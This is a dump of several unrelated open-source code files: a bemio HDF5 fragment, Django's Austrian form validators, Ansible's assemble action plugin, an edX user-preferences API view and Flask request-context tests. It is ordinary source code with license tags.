bemio_version = f.create_dataset('bemio_information/version',data=base())
rawOut = f.create_dataset('bem_data/output',data=bemio_obj.body[key].bem_raw_data)
rawOut.attrs['description'] = 'Raw output from BEM code'
code = f.create_dataset('bem_data/code',data=bemio_obj.body[key].bem_code)
code.attrs['description'] = 'BEM code'
| apache-2.0 |
tianyi33/simple_blog | django/contrib/localflavor/at/forms.py | 109 | 2551 | """
AT-specific Form helpers
"""
from __future__ import unicode_literals
import re
from django.core.validators import EMPTY_VALUES
from django.forms import ValidationError
from django.forms.fields import Field, RegexField, Select
from django.utils.translation import ugettext_lazy as _
re_ssn = re.compile(r'^\d{4} \d{6}')
class ATZipCodeField(RegexField):
"""
A form field that validates its input is an Austrian postcode.
Accepts 4 digits (first digit must be greater than 0).
"""
default_error_messages = {
'invalid': _('Enter a zip code in the format XXXX.'),
}
def __init__(self, max_length=None, min_length=None, *args, **kwargs):
super(ATZipCodeField, self).__init__(r'^[1-9]{1}\d{3}$',
max_length, min_length, *args, **kwargs)
class ATStateSelect(Select):
"""
A Select widget that uses a list of AT states as its choices.
"""
def __init__(self, attrs=None):
from django.contrib.localflavor.at.at_states import STATE_CHOICES
super(ATStateSelect, self).__init__(attrs, choices=STATE_CHOICES)
class ATSocialSecurityNumberField(Field):
"""
Austrian Social Security numbers are composed of a 4 digits and 6 digits
field. The latter represents in most cases the person's birthdate while
the first 4 digits represent a 3-digits counter and a one-digit checksum.
The 6-digits field can also differ from the person's birthdate if the
3-digits counter suffered an overflow.
This code is based on information available on
http://de.wikipedia.org/wiki/Sozialversicherungsnummer#.C3.96sterreich
"""
default_error_messages = {
'invalid': _('Enter a valid Austrian Social Security Number in XXXX XXXXXX format.'),
}
def clean(self, value):
value = super(ATSocialSecurityNumberField, self).clean(value)
if value in EMPTY_VALUES:
return ""
if not re_ssn.search(value):
raise ValidationError(self.error_messages['invalid'])
sqnr, date = value.split(" ")
sqnr, check = (sqnr[:3], (sqnr[3]))
if int(sqnr) < 100:
raise ValidationError(self.error_messages['invalid'])
res = int(sqnr[0])*3 + int(sqnr[1])*7 + int(sqnr[2])*9 \
+ int(date[0])*5 + int(date[1])*8 + int(date[2])*4 \
+ int(date[3])*2 + int(date[4])*1 + int(date[5])*6
res = res % 11
if res != int(check):
raise ValidationError(self.error_messages['invalid'])
return '%s%s %s'%(sqnr, check, date,)
| mit |
axtra/ansible | lib/ansible/runner/action_plugins/assemble.py | 109 | 6150 | # (c) 2013-2014, Michael DeHaan <michael.dehaan@gmail.com>
# Stephen Fromm <sfromm@gmail.com>
# Brian Coca <briancoca+dev@gmail.com>
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
import os
import os.path
import pipes
import shutil
import tempfile
import base64
import re
from ansible import utils
from ansible.runner.return_data import ReturnData
class ActionModule(object):
TRANSFERS_FILES = True
def __init__(self, runner):
self.runner = runner
def _assemble_from_fragments(self, src_path, delimiter=None, compiled_regexp=None):
''' assemble a file from a directory of fragments '''
tmpfd, temp_path = tempfile.mkstemp()
tmp = os.fdopen(tmpfd,'w')
delimit_me = False
add_newline = False
for f in sorted(os.listdir(src_path)):
if compiled_regexp and not compiled_regexp.search(f):
continue
fragment = "%s/%s" % (src_path, f)
if not os.path.isfile(fragment):
continue
fragment_content = file(fragment).read()
# always put a newline between fragments if the previous fragment didn't end with a newline.
if add_newline:
tmp.write('\n')
# delimiters should only appear between fragments
if delimit_me:
if delimiter:
# un-escape anything like newlines
delimiter = delimiter.decode('unicode-escape')
tmp.write(delimiter)
# always make sure there's a newline after the
# delimiter, so lines don't run together
if delimiter[-1] != '\n':
tmp.write('\n')
tmp.write(fragment_content)
delimit_me = True
if fragment_content.endswith('\n'):
add_newline = False
else:
add_newline = True
tmp.close()
return temp_path
def run(self, conn, tmp, module_name, module_args, inject, complex_args=None, **kwargs):
# load up options
options = {}
if complex_args:
options.update(complex_args)
options.update(utils.parse_kv(module_args))
src = options.get('src', None)
dest = options.get('dest', None)
delimiter = options.get('delimiter', None)
remote_src = utils.boolean(options.get('remote_src', 'yes'))
regexp = options.get('regexp', None)
if src is None or dest is None:
result = dict(failed=True, msg="src and dest are required")
return ReturnData(conn=conn, comm_ok=False, result=result)
if remote_src:
return self.runner._execute_module(conn, tmp, 'assemble', module_args, inject=inject, complex_args=complex_args)
elif '_original_file' in inject:
src = utils.path_dwim_relative(inject['_original_file'], 'files', src, self.runner.basedir)
else:
# the source is local, so expand it here
src = os.path.expanduser(src)
_re = None
if regexp is not None:
_re = re.compile(regexp)
# Does all work assembling the file
path = self._assemble_from_fragments(src, delimiter, _re)
path_checksum = utils.checksum_s(path)
dest = self.runner._remote_expand_user(conn, dest, tmp)
remote_checksum = self.runner._remote_checksum(conn, tmp, dest, inject)
if path_checksum != remote_checksum:
resultant = file(path).read()
if self.runner.diff:
dest_result = self.runner._execute_module(conn, tmp, 'slurp', "path=%s" % dest, inject=inject, persist_files=True)
if 'content' in dest_result.result:
dest_contents = dest_result.result['content']
if dest_result.result['encoding'] == 'base64':
dest_contents = base64.b64decode(dest_contents)
else:
raise Exception("unknown encoding, failed: %s" % dest_result.result)
xfered = self.runner._transfer_str(conn, tmp, 'src', resultant)
# fix file permissions when the copy is done as a different user
if self.runner.become and self.runner.become_user != 'root':
self.runner._remote_chmod(conn, 'a+r', xfered, tmp)
# run the copy module
new_module_args = dict(
src=xfered,
dest=dest,
original_basename=os.path.basename(src),
)
module_args_tmp = utils.merge_module_args(module_args, new_module_args)
if self.runner.noop_on_check(inject):
return ReturnData(conn=conn, comm_ok=True, result=dict(changed=True), diff=dict(before_header=dest, after_header=src, after=resultant))
else:
res = self.runner._execute_module(conn, tmp, 'copy', module_args_tmp, inject=inject)
res.diff = dict(after=resultant)
return res
else:
new_module_args = dict(
src=xfered,
dest=dest,
original_basename=os.path.basename(src),
)
# make sure checkmod is passed on correctly
if self.runner.noop_on_check(inject):
new_module_args['CHECKMODE'] = True
module_args_tmp = utils.merge_module_args(module_args, new_module_args)
return self.runner._execute_module(conn, tmp, 'file', module_args_tmp, inject=inject)
| gpl-3.0 |
JioEducation/edx-platform | openedx/core/djangoapps/user_api/preferences/views.py | 60 | 10869 | """
NOTE: this API is WIP and has not yet been approved. Do not use this API
without talking to Christina or Andy.
For more information, see:
https://openedx.atlassian.net/wiki/display/TNL/User+API
"""
from rest_framework.views import APIView
from rest_framework.response import Response
from rest_framework import status
from rest_framework import permissions
from django.db import transaction
from django.utils.translation import ugettext as _
from openedx.core.lib.api.authentication import (
SessionAuthenticationAllowInactiveUser,
OAuth2AuthenticationAllowInactiveUser,
)
from openedx.core.lib.api.parsers import MergePatchParser
from openedx.core.lib.api.permissions import IsUserInUrlOrStaff
from ..errors import UserNotFound, UserNotAuthorized, PreferenceValidationError, PreferenceUpdateError
from .api import (
get_user_preference, get_user_preferences, set_user_preference, update_user_preferences, delete_user_preference
)
class PreferencesView(APIView):
"""
**Use Cases**
Get or update the user's preference information. Updates are only
supported through merge patch. Preference values of null in a
patch request are treated as requests to remove the preference.
**Example Requests**
GET /api/user/v1/preferences/{username}/
PATCH /api/user/v1/preferences/{username}/ with content_type "application/merge-patch+json"
**Response Values for GET**
If no user exists with the specified username, an HTTP 404 "Not
Found" response is returned.
If a user without "is_staff" access requests preferences for a
different user, an HTTP 404 "Not Found" message is returned.
If the user makes the request for her own account, or makes a
request for another account and has "is_staff" access, an HTTP 200
"OK" response is returned. The response contains a JSON dictionary
with a key/value pair (of type String) for each preference.
The list of preferences depends on your implementation. By default,
the list includes the following preferences.
* account_privacy: The user's setting for sharing her personal
profile. Possible values are "all_users" or "private".
* pref-lan: The user's preferred language, as set in account
settings.
**Response Values for PATCH**
Users can only modify their own preferences. If the
requesting user does not have the specified username and has staff
access, the request returns an HTTP 403 "Forbidden" response. If
the requesting user does not have staff access, the request
returns an HTTP 404 "Not Found" response to avoid revealing the
existence of the account.
If no user exists with the specified username, an HTTP 404 "Not
Found" response is returned.
If "application/merge-patch+json" is not the specified content
type, a 415 "Unsupported Media Type" response is returned.
If validation errors prevent the update, this method returns a 400
"Bad Request" response that includes a "field_errors" field that
lists all error messages.
If a failure at the time of the update prevents the update, a 400
"Bad Request" error is returned. The JSON collection contains
specific errors.
If the update is successful, an HTTP 204 "No Content" response is
returned with no additional content.
"""
authentication_classes = (OAuth2AuthenticationAllowInactiveUser, SessionAuthenticationAllowInactiveUser)
permission_classes = (permissions.IsAuthenticated, IsUserInUrlOrStaff)
parser_classes = (MergePatchParser,)
def get(self, request, username):
"""
GET /api/user/v1/preferences/{username}/
"""
try:
user_preferences = get_user_preferences(request.user, username=username)
except UserNotAuthorized:
return Response(status=status.HTTP_403_FORBIDDEN)
except UserNotFound:
return Response(status=status.HTTP_404_NOT_FOUND)
return Response(user_preferences)
def patch(self, request, username):
"""
PATCH /api/user/v1/preferences/{username}/
"""
if not request.data or not getattr(request.data, "keys", None):
error_message = _("No data provided for user preference update")
return Response(
{
"developer_message": error_message,
"user_message": error_message
},
status=status.HTTP_400_BAD_REQUEST
)
try:
with transaction.atomic():
update_user_preferences(request.user, request.data, user=username)
except UserNotAuthorized:
return Response(status=status.HTTP_403_FORBIDDEN)
except UserNotFound:
return Response(status=status.HTTP_404_NOT_FOUND)
except PreferenceValidationError as error:
return Response(
{"field_errors": error.preference_errors},
status=status.HTTP_400_BAD_REQUEST
)
except PreferenceUpdateError as error:
return Response(
{
"developer_message": error.developer_message,
"user_message": error.user_message
},
status=status.HTTP_400_BAD_REQUEST
)
return Response(status=status.HTTP_204_NO_CONTENT)
class PreferencesDetailView(APIView):
"""
**Use Cases**
Get, create, update, or delete a specific user preference.
**Example Requests**
GET /api/user/v1/preferences/{username}/{preference_key}
PUT /api/user/v1/preferences/{username}/{preference_key}
DELETE /api/user/v1/preferences/{username}/{preference_key}
**Response Values for GET**
If the specified username or preference does not exist, an HTTP
404 "Not Found" response is returned.
If a user without "is_staff" access requests preferences for a
different user, a 404 error is returned.
If the user makes the request for her own account, or makes a
request for another account and has "is_staff" access, an HTTP 200
"OK" response is returned that contains a JSON string.
**Response Values for PUT**
Users can only modify their own preferences. If the
requesting user does not have the specified username and has staff
access, the request returns an HTTP 403 "Forbidden" response. If
the requesting user does not have staff access, the request
returns an HTTP 404 "Not Found" response to avoid revealing the
existence of the account.
If the specified preference does not exist, an HTTP 404 "Not
Found" response is returned.
If the request is successful, a 204 "No Content" status is returned
with no additional content.
**Response Values for DELETE**
Users can only delete their own preferences. If the
requesting user does not have the specified username and has staff
access, the request returns an HTTP 403 "Forbidden" response. If
the requesting user does not have staff access, the request
returns an HTTP 404 "Not Found" response to avoid revealing the
existence of the account.
If the specified preference does not exist, an HTTP 404 "Not
Found" response is returned.
If the update is successful, an HTTP 204 "No Content" response is
returned with no additional content.
"""
authentication_classes = (OAuth2AuthenticationAllowInactiveUser, SessionAuthenticationAllowInactiveUser)
permission_classes = (permissions.IsAuthenticated, IsUserInUrlOrStaff)
def get(self, request, username, preference_key):
"""
GET /api/user/v1/preferences/{username}/{preference_key}
"""
try:
value = get_user_preference(request.user, preference_key, username=username)
# There was no preference with that key, raise a 404.
if value is None:
return Response(status=status.HTTP_404_NOT_FOUND)
except UserNotAuthorized:
return Response(status=status.HTTP_403_FORBIDDEN)
except UserNotFound:
return Response(status=status.HTTP_404_NOT_FOUND)
return Response(value)
def put(self, request, username, preference_key):
"""
PUT /api/user/v1/preferences/{username}/{preference_key}
"""
try:
set_user_preference(request.user, preference_key, request.data, username=username)
except UserNotAuthorized:
return Response(status=status.HTTP_403_FORBIDDEN)
except UserNotFound:
return Response(status=status.HTTP_404_NOT_FOUND)
except PreferenceValidationError as error:
return Response(
{
"developer_message": error.preference_errors[preference_key]["developer_message"],
"user_message": error.preference_errors[preference_key]["user_message"]
},
status=status.HTTP_400_BAD_REQUEST
)
except PreferenceUpdateError as error:
return Response(
{
"developer_message": error.developer_message,
"user_message": error.user_message
},
status=status.HTTP_400_BAD_REQUEST
)
return Response(status=status.HTTP_204_NO_CONTENT)
def delete(self, request, username, preference_key):
"""
DELETE /api/user/v1/preferences/{username}/{preference_key}
"""
try:
preference_existed = delete_user_preference(request.user, preference_key, username=username)
except UserNotAuthorized:
return Response(status=status.HTTP_403_FORBIDDEN)
except UserNotFound:
return Response(status=status.HTTP_404_NOT_FOUND)
except PreferenceUpdateError as error:
return Response(
{
"developer_message": error.developer_message,
"user_message": error.user_message
},
status=status.HTTP_400_BAD_REQUEST
)
if not preference_existed:
return Response(status=status.HTTP_404_NOT_FOUND)
return Response(status=status.HTTP_204_NO_CONTENT)
| agpl-3.0 |
bodefuwa/flask | tests/test_reqctx.py | 140 | 5262 | # -*- coding: utf-8 -*-
"""
tests.reqctx
~~~~~~~~~~~~
Tests the request context.
:copyright: (c) 2015 by Armin Ronacher.
:license: BSD, see LICENSE for more details.
"""
import pytest
import flask
try:
from greenlet import greenlet
except ImportError:
greenlet = None
def test_teardown_on_pop():
buffer = []
app = flask.Flask(__name__)
@app.teardown_request
def end_of_request(exception):
buffer.append(exception)
ctx = app.test_request_context()
ctx.push()
assert buffer == []
ctx.pop()
assert buffer == [None]
def test_teardown_with_previous_exception():
buffer = []
app = flask.Flask(__name__)
@app.teardown_request
def end_of_request(exception):
buffer.append(exception)
try:
raise Exception('dummy')
except Exception:
pass
with app.test_request_context():
assert buffer == []
assert buffer == [None]
def test_teardown_with_handled_exception():
buffer = []
app = flask.Flask(__name__)
@app.teardown_request
def end_of_request(exception):
buffer.append(exception)
with app.test_request_context():
assert buffer == []
try:
raise Exception('dummy')
except Exception:
pass
assert buffer == [None]
def test_proper_test_request_context():
app = flask.Flask(__name__)
app.config.update(
SERVER_NAME='localhost.localdomain:5000'
)
@app.route('/')
def index():
return None
@app.route('/', subdomain='foo')
def sub():
return None
with app.test_request_context('/'):
assert flask.url_for('index', _external=True) == \
'http://localhost.localdomain:5000/'
with app.test_request_context('/'):
assert flask.url_for('sub', _external=True) == \
'http://foo.localhost.localdomain:5000/'
try:
with app.test_request_context('/', environ_overrides={'HTTP_HOST': 'localhost'}):
pass
except ValueError as e:
assert str(e) == (
"the server name provided "
"('localhost.localdomain:5000') does not match the "
"server name from the WSGI environment ('localhost')"
)
app.config.update(SERVER_NAME='localhost')
with app.test_request_context('/', environ_overrides={'SERVER_NAME': 'localhost'}):
pass
app.config.update(SERVER_NAME='localhost:80')
with app.test_request_context('/', environ_overrides={'SERVER_NAME': 'localhost:80'}):
pass
def test_context_binding():
app = flask.Flask(__name__)
@app.route('/')
def index():
return 'Hello %s!' % flask.request.args['name']
@app.route('/meh')
def meh():
return flask.request.url
with app.test_request_context('/?name=World'):
assert index() == 'Hello World!'
with app.test_request_context('/meh'):
assert meh() == 'http://localhost/meh'
assert flask._request_ctx_stack.top is None
def test_context_test():
app = flask.Flask(__name__)
assert not flask.request
assert not flask.has_request_context()
ctx = app.test_request_context()
ctx.push()
try:
assert flask.request
assert flask.has_request_context()
finally:
ctx.pop()
def test_manual_context_binding():
app = flask.Flask(__name__)
@app.route('/')
def index():
return 'Hello %s!' % flask.request.args['name']
ctx = app.test_request_context('/?name=World')
ctx.push()
assert index() == 'Hello World!'
ctx.pop()
try:
index()
except RuntimeError:
pass
else:
assert 0, 'expected runtime error'
@pytest.mark.skipif(greenlet is None, reason='greenlet not installed')
def test_greenlet_context_copying():
app = flask.Flask(__name__)
greenlets = []
@app.route('/')
def index():
reqctx = flask._request_ctx_stack.top.copy()
def g():
assert not flask.request
assert not flask.current_app
with reqctx:
assert flask.request
assert flask.current_app == app
assert flask.request.path == '/'
assert flask.request.args['foo'] == 'bar'
assert not flask.request
return 42
greenlets.append(greenlet(g))
return 'Hello World!'
rv = app.test_client().get('/?foo=bar')
assert rv.data == b'Hello World!'
result = greenlets[0].run()
assert result == 42
@pytest.mark.skipif(greenlet is None, reason='greenlet not installed')
def test_greenlet_context_copying_api():
app = flask.Flask(__name__)
greenlets = []
@app.route('/')
def index():
reqctx = flask._request_ctx_stack.top.copy()
@flask.copy_current_request_context
def g():
assert flask.request
assert flask.current_app == app
assert flask.request.path == '/'
assert flask.request.args['foo'] == 'bar'
return 42
greenlets.append(greenlet(g))
return 'Hello World!'
rv = app.test_client().get('/?foo=bar')
assert rv.data == b'Hello World!'
result = greenlets[0].run()
assert result == 42
| bsd-3-clause |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.